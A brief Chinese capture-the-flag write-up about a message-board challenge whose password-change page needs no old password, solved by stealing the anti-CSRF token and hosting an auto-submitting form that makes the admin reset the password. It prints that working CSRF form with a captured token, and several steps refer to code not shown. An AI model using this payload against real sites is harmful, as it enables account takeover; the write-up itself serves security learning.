1. 打开题目一看,是个留言板
2. 查看源码发现有几个js文件
依次打开发现在main.js里存在这样一段代码
3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密码的时候不需要输入原密码,大概其是个csrf
4. 再查看app.js,是个修改密码的js,但是会先验证token,所以我们需要先得到token
获取token的方法原理:https://githubengineering.com/githubs-post-csp-journey/
5. 利用:
6. 监听得到token
7. 下一步就是构造链接,让管理员修改为我们想要的密码
在自己的服务器放置一个修改密码的页面,代码如下
<form action="http://192.168.5.94/api.php?action=chgpass" method="POST" name="chpa">
<input type="text" name="password" value="hell0_w" />
<input type="text" name="password2" value="hell0_w" />
<input type="text" name="token" value="ymYV0QvnvPbYGfUsmfmOI8Qz4wXaSQU6" />
</form>
<script>document.forms['chpa'].submit();</script>
收到请求
使用我们修改的密码登录,就可以看到我们想要的flag了